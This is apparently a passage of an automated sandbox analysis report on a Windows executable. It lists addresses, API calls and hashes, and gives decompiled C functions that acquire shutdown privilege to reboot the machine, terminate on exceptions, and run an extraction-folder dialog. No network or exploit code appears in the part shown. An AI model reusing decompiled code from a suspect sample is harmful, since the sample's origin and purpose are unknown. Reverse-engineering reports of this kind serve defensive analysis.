                                                                                                                                                                                                                                            0x00a95f8d
                                                                                                                                                                                                                                            0x00a95f8d
                                                                                                                                                                                                                                            0x00a95f8d
                                                                                                                                                                                                                                            0x00a95f8f
                                                                                                                                                                                                                                            0x00a95fc1
                                                                                                                                                                                                                                            0x00a95fc1
                                                                                                                                                                                                                                            0x00a95fc1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95e74
                                                                                                                                                                                                                                            0x00a95e74
                                                                                                                                                                                                                                            0x00a95e77
                                                                                                                                                                                                                                            0x00a95ea0
                                                                                                                                                                                                                                            0x00a95ebd
                                                                                                                                                                                                                                            0x00a95f79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95f7f
                                                                                                                                                                                                                                            0x00a95ec3
                                                                                                                                                                                                                                            0x00a95ec3
                                                                                                                                                                                                                                            0x00a95ecc
                                                                                                                                                                                                                                            0x00a95ed4
                                                                                                                                                                                                                                            0x00a95ed6
                                                                                                                                                                                                                                            0x00a95edc
                                                                                                                                                                                                                                            0x00a95edf
                                                                                                                                                                                                                                            0x00a95eea
                                                                                                                                                                                                                                            0x00a95eed
                                                                                                                                                                                                                                            0x00a95f3f
                                                                                                                                                                                                                                            0x00a95f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95eef
                                                                                                                                                                                                                                            0x00a95eef
                                                                                                                                                                                                                                            0x00a95ef2
                                                                                                                                                                                                                                            0x00a95f34
                                                                                                                                                                                                                                            0x00a95ef4
                                                                                                                                                                                                                                            0x00a95ef4
                                                                                                                                                                                                                                            0x00a95ef7
                                                                                                                                                                                                                                            0x00a95f2b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95ef9
                                                                                                                                                                                                                                            0x00a95ef9
                                                                                                                                                                                                                                            0x00a95efc
                                                                                                                                                                                                                                            0x00a95f22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95efe
                                                                                                                                                                                                                                            0x00a95eff
                                                                                                                                                                                                                                            0x00a95f02
                                                                                                                                                                                                                                            0x00a95f16
                                                                                                                                                                                                                                            0x00a95f04
                                                                                                                                                                                                                                            0x00a95f07
                                                                                                                                                                                                                                            0x00a95f0d
                                                                                                                                                                                                                                            0x00a95f46
                                                                                                                                                                                                                                            0x00a95f46
                                                                                                                                                                                                                                            0x00a95f09
                                                                                                                                                                                                                                            0x00a95f09
                                                                                                                                                                                                                                            0x00a95f09
                                                                                                                                                                                                                                            0x00a95f07
                                                                                                                                                                                                                                            0x00a95f02
                                                                                                                                                                                                                                            0x00a95efc
                                                                                                                                                                                                                                            0x00a95ef7
                                                                                                                                                                                                                                            0x00a95ef2
                                                                                                                                                                                                                                            0x00a95f4c
                                                                                                                                                                                                                                            0x00a95f4e
                                                                                                                                                                                                                                            0x00a95f50
                                                                                                                                                                                                                                            0x00a95f54
                                                                                                                                                                                                                                            0x00a95ed4
                                                                                                                                                                                                                                            0x00a95ea2
                                                                                                                                                                                                                                            0x00a95ea4
                                                                                                                                                                                                                                            0x00a95eaf
                                                                                                                                                                                                                                            0x00a95eaf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95e79
                                                                                                                                                                                                                                            0x00a95e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95e83
                                                                                                                                                                                                                                            0x00a95e83
                                                                                                                                                                                                                                            0x00a95e83
                                                                                                                                                                                                                                            0x00a95e85
                                                                                                                                                                                                                                            0x00a95e85
                                                                                                                                                                                                                                            0x00a95e8e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95e94
                                                                                                                                                                                                                                            0x00a95e8e
                                                                                                                                                                                                                                            0x00a95e7d
                                                                                                                                                                                                                                            0x00a95e77
                                                                                                                                                                                                                                            0x00a95e6e
                                                                                                                                                                                                                                            0x00a95e65
                                                                                                                                                                                                                                            0x00a95e5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95dd0
                                                                                                                                                                                                                                            0x00a95dd0
                                                                                                                                                                                                                                            0x00a95dd0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95dd0
                                                                                                                                                                                                                                            0x00a95dce
                                                                                                                                                                                                                                            0x00a95dca
                                                                                                                                                                                                                                            0x00a95dba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95d00
                                                                                                                                                                                                                                            0x00a95dd9
                                                                                                                                                                                                                                            0x00a95e04
                                                                                                                                                                                                                                            0x00a961fe
                                                                                                                                                                                                                                            0x00a95e0a
                                                                                                                                                                                                                                            0x00a95e0c
                                                                                                                                                                                                                                            0x00a95e17
                                                                                                                                                                                                                                            0x00a95e17
                                                                                                                                                                                                                                            0x00a95e04
                                                                                                                                                                                                                                            0x00a96200
                                                                                                                                                                                                                                            0x00a96200
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 00A95CEE
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00A98B3E,00000104,00000000,?,?), ref: 00A95DFC
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A95E3E
                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 00A95EE1
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A95F6F
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A95FA7
                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 00A96008
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A960AA
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00A91140,00000000,00000040,00000000), ref: 00A961F1
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00A961F8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                            • Opcode ID: b680ee53722b287e4299dbfc0044a42ef724b49219403446623c9fd21d3c862f
                                                                                                                                                                                                                                            • Instruction ID: f7922b3a788ad95304af57be01573b8661f0a84be441bd351db615a2bd9b8b96
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b680ee53722b287e4299dbfc0044a42ef724b49219403446623c9fd21d3c862f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BD14471F04A545ADF3BCB7C8C8A7FA3BF1AB16340F1441ABC586CA590DA758E878B40
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                                            			E00A91F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                            				signed char _t30;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                                                                                            				_t38 = __edi;
                                                                                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                                                                                            				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						if( *0xa99a40 != 0) {
                                                                                                                                                                                                                                            							_pop(_t30);
                                                                                                                                                                                                                                            							_t44 = _t46;
                                                                                                                                                                                                                                            							_t13 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                            								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                            								_v12 = 2;
                                                                                                                                                                                                                                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                            								_t41 = _t41;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                            										_t25 = 1;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t37 = 0x4f7;
                                                                                                                                                                                                                                            										goto L3;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t37 = 0x4f6;
                                                                                                                                                                                                                                            									goto L4;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t37 = 0x4f5;
                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								L4:
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								E00A944B9(0, _t37);
                                                                                                                                                                                                                                            								_t25 = 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_pop(_t40);
                                                                                                                                                                                                                                            							return E00A96CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t37 = 0x522;
                                                                                                                                                                                                                                            						_t28 = E00A944B9(0, 0x522, 0xa91140, 0, 0x40, 4);
                                                                                                                                                                                                                                            						if(_t28 != 6) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					__eax = E00A91EA7(__ecx);
                                                                                                                                                                                                                                            					if(__eax != 2) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						return _t28;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x00a91f90
                                                                                                                                                                                                                                            0x00a91f90
                                                                                                                                                                                                                                            0x00a91f93
                                                                                                                                                                                                                                            0x00a91f98
                                                                                                                                                                                                                                            0x00a91fa4
                                                                                                                                                                                                                                            0x00a91fa7
                                                                                                                                                                                                                                            0x00a91fc5
                                                                                                                                                                                                                                            0x00a91fcd
                                                                                                                                                                                                                                            0x00a91fdb
                                                                                                                                                                                                                                            0x00a91ee5
                                                                                                                                                                                                                                            0x00a91eea
                                                                                                                                                                                                                                            0x00a91ef1
                                                                                                                                                                                                                                            0x00a91ef4
                                                                                                                                                                                                                                            0x00a91f0c
                                                                                                                                                                                                                                            0x00a91f2e
                                                                                                                                                                                                                                            0x00a91f3a
                                                                                                                                                                                                                                            0x00a91f46
                                                                                                                                                                                                                                            0x00a91f4d
                                                                                                                                                                                                                                            0x00a91f58
                                                                                                                                                                                                                                            0x00a91f60
                                                                                                                                                                                                                                            0x00a91f61
                                                                                                                                                                                                                                            0x00a91f62
                                                                                                                                                                                                                                            0x00a91f75
                                                                                                                                                                                                                                            0x00a91f80
                                                                                                                                                                                                                                            0x00a91f77
                                                                                                                                                                                                                                            0x00a91f77
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91f77
                                                                                                                                                                                                                                            0x00a91f64
                                                                                                                                                                                                                                            0x00a91f64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91f64
                                                                                                                                                                                                                                            0x00a91f0e
                                                                                                                                                                                                                                            0x00a91f0e
                                                                                                                                                                                                                                            0x00a91f13
                                                                                                                                                                                                                                            0x00a91f13
                                                                                                                                                                                                                                            0x00a91f14
                                                                                                                                                                                                                                            0x00a91f14
                                                                                                                                                                                                                                            0x00a91f16
                                                                                                                                                                                                                                            0x00a91f17
                                                                                                                                                                                                                                            0x00a91f1a
                                                                                                                                                                                                                                            0x00a91f1f
                                                                                                                                                                                                                                            0x00a91f1f
                                                                                                                                                                                                                                            0x00a91f86
                                                                                                                                                                                                                                            0x00a91f8f
                                                                                                                                                                                                                                            0x00a91fcf
                                                                                                                                                                                                                                            0x00a91fd3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91fd3
                                                                                                                                                                                                                                            0x00a91fa9
                                                                                                                                                                                                                                            0x00a91fb4
                                                                                                                                                                                                                                            0x00a91fbb
                                                                                                                                                                                                                                            0x00a91fc3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91fc3
                                                                                                                                                                                                                                            0x00a91f9a
                                                                                                                                                                                                                                            0x00a91f9a
                                                                                                                                                                                                                                            0x00a91fa2
                                                                                                                                                                                                                                            0x00a91fd9
                                                                                                                                                                                                                                            0x00a91fda
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91fa2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A91EFB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00A91F02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00A91FD3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                            • Opcode ID: 88140ab37c5d4503be0dc35c51196a873d25f5e54a29edb00e9cda1a1ff25a18
                                                                                                                                                                                                                                            • Instruction ID: a646123a72f2c8813302b191a3cbeefe0e6da557f742a3dc99556efa5e8f2452
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88140ab37c5d4503be0dc35c51196a873d25f5e54a29edb00e9cda1a1ff25a18
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0521B771B4020A7BDF209BE59C4AFBF76F8EB95B50F20051FFA02D6181DB758802D6A5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A96CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                            				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00a96cf7
                                                                                                                                                                                                                                            0x00a96d00
                                                                                                                                                                                                                                            0x00a96d19

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A96E26,00A91000), ref: 00A96CF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00A96E26,?,00A96E26,00A91000), ref: 00A96D00
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,00A96E26,00A91000), ref: 00A96D0B
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00A96E26,00A91000), ref: 00A96D12
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                            • Opcode ID: c9a1db699e53e79112050d3aeb33010d7d6a4e29ba8c2a4d9c869ff50931e1a4
                                                                                                                                                                                                                                            • Instruction ID: a448a85249839b5dfdc511bdbfe7d04634735f13f4465ab32bc9e18ac77d6685
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9a1db699e53e79112050d3aeb33010d7d6a4e29ba8c2a4d9c869ff50931e1a4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CD0C932200108BBDB006BE1EC0CA593F28EB98212F644103F31986030CE3244528B92
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                                            			E00A93210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				int _t20;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				int _t23;
                                                                                                                                                                                                                                            				char _t24;
                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				int _t38;
                                                                                                                                                                                                                                            				int _t39;
                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				CHAR* _t49;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t64;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                                                                                                            				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                            					EndDialog(_t64, ??);
                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 = 1;
                                                                                                                                                                                                                                            				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                                            					E00A943D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                            					SetWindowTextA(_t64, "lenta");
                                                                                                                                                                                                                                            					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                            					__eflags =  *0xa99a40 - _t42; // 0x3
                                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                                            						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L36:
                                                                                                                                                                                                                                            					return _t42;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t10 == _t42) {
                                                                                                                                                                                                                                            					_t20 = _a12 - 1;
                                                                                                                                                                                                                                            					__eflags = _t20;
                                                                                                                                                                                                                                            					if(_t20 == 0) {
                                                                                                                                                                                                                                            						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa991e4, 0x104);
                                                                                                                                                                                                                                            						__eflags = _t21;
                                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							_t58 = 0x4bf;
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							E00A944B9(_t64, _t58);
                                                                                                                                                                                                                                            							goto L39;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t49 = 0xa991e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t23 =  *_t49;
                                                                                                                                                                                                                                            							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                            							__eflags = _t23;
                                                                                                                                                                                                                                            						} while (_t23 != 0);
                                                                                                                                                                                                                                            						__eflags = _t49 - 0xa991e5 - 3;
                                                                                                                                                                                                                                            						if(_t49 - 0xa991e5 < 3) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 =  *0xa991e5; // 0x3a
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                            						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                            							L21:
                                                                                                                                                                                                                                            							_t25 = GetFileAttributesA(0xa991e4);
                                                                                                                                                                                                                                            							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                            							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            								L26:
                                                                                                                                                                                                                                            								E00A9658A(0xa991e4, 0x104, 0xa91140);
                                                                                                                                                                                                                                            								_t27 = E00A958C8(0xa991e4);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 != 0) {
                                                                                                                                                                                                                                            									__eflags =  *0xa991e4 - 0x5c;
                                                                                                                                                                                                                                            									if( *0xa991e4 != 0x5c) {
                                                                                                                                                                                                                                            										L30:
                                                                                                                                                                                                                                            										_t30 = E00A9597D(0xa991e4, 1, _t64, 1);
                                                                                                                                                                                                                                            										__eflags = _t30;
                                                                                                                                                                                                                                            										if(_t30 == 0) {
                                                                                                                                                                                                                                            											L35:
                                                                                                                                                                                                                                            											_t42 = 1;
                                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                                            											goto L36;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t42 = 1;
                                                                                                                                                                                                                                            										EndDialog(_t64, 1);
                                                                                                                                                                                                                                            										goto L36;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0xa991e5 - 0x5c;
                                                                                                                                                                                                                                            									if( *0xa991e5 == 0x5c) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L30;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t58 = 0x4be;
                                                                                                                                                                                                                                            								goto L25;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t32 = E00A944B9(_t64, 0x54a, 0xa991e4, 0, 0x20, 4);
                                                                                                                                                                                                                                            							__eflags = _t32 - 6;
                                                                                                                                                                                                                                            							if(_t32 != 6) {
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t33 = CreateDirectoryA(0xa991e4, 0);
                                                                                                                                                                                                                                            							__eflags = _t33;
                                                                                                                                                                                                                                            							if(_t33 != 0) {
                                                                                                                                                                                                                                            								goto L26;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0xa991e4);
                                                                                                                                                                                                                                            							_t58 = 0x4cb;
                                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags =  *0xa991e4 - 0x5c;
                                                                                                                                                                                                                                            						if( *0xa991e4 != 0x5c) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                            						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t34 = _t20 - 1;
                                                                                                                                                                                                                                            					__eflags = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						EndDialog(_t64, 0);
                                                                                                                                                                                                                                            						 *0xa99124 = 0x800704c7;
                                                                                                                                                                                                                                            						goto L39;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                            					if(_t34 != 0x834) {
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t37 = LoadStringA( *0xa99a3c, 0x3e8, 0xa98598, 0x200);
                                                                                                                                                                                                                                            					__eflags = _t37;
                                                                                                                                                                                                                                            					if(_t37 != 0) {
                                                                                                                                                                                                                                            						_t38 = E00A94224(_t64, _t46, _t46);
                                                                                                                                                                                                                                            						__eflags = _t38;
                                                                                                                                                                                                                                            						if(_t38 == 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa987a0);
                                                                                                                                                                                                                                            						__eflags = _t39;
                                                                                                                                                                                                                                            						if(_t39 != 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t63 = 0x4c0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						E00A944B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
